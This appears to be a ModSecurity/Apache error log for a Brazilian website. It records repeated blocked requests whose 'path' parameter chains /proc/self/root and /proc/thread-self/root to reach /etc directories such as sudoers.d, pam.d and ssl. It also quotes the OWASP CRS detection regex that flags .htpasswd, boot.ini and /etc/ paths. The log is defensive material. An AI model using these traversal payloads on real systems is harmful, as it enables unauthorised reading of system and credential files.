[Mon Mar 16 18:33:33.011171 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:38538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3LLABkC4fWIHEf8EXLAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:33:36.659723 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.243.203:37996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3L8_BxrYCr4hPDw8JXwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:33:37.998970 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.243.203:51850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3MUr9dMAiw-8KANNnbAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:34:37.743365 2026] [:error] [pid 29802:tid 140411674785536] [client 74.7.241.46:38552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3bc_BxrYCr4hPDw8JoAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:34:43.657087 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:46490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3c9SswJuvopo3lOiABQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:35:02.527222 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.244.31:37156] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh3ho6lpbStxTqkSkuH3AAAAlI"]
[Mon Mar 16 18:35:10.388862 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:46498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3jrysWC90G-1nBrBkQQAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:35:17.050932 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:51854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3lbABkC4fWIHEf8EXpQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:35:31.916825 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:41548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3o7ysWC90G-1nBrBkVAAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:35:41.960154 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:38750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3rc_BxrYCr4hPDw8JxAAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:35:46.573167 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.243.203:47450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3skr9dMAiw-8KANNnxQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:36:30.549933 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:50564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh33kr9dMAiw-8KANNoIQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:36:37.510791 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:45636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh35bABkC4fWIHEf8EXygAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:36:38.754941 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:42876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh35rABkC4fWIHEf8EXzAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:37:01.531218 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:42878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3_bABkC4fWIHEf8EX7AAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:37:02.010835 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.228.16:41356] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh3_qTCbgAP5jq5TehLJgAAAs4"]
[Mon Mar 16 18:37:28.470342 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.241.46:42798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4GM_BxrYCr4hPDw8KCwAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:37:58.024395 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:37142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4NrysWC90G-1nBrBkmwAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:38:03.903152 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:47364] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4O6QpVkWug9HeOt9UUAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:38:08.959425 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:47378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4QKQpVkWug9HeOt9UUwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:38:26.991173 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:35624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4UrABkC4fWIHEf8EYLgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:38:34.913546 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:57970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4WtSswJuvopo3lOiA3gAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:38:36.114296 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:58538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4XI6lpbStxTqkSkuIOwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
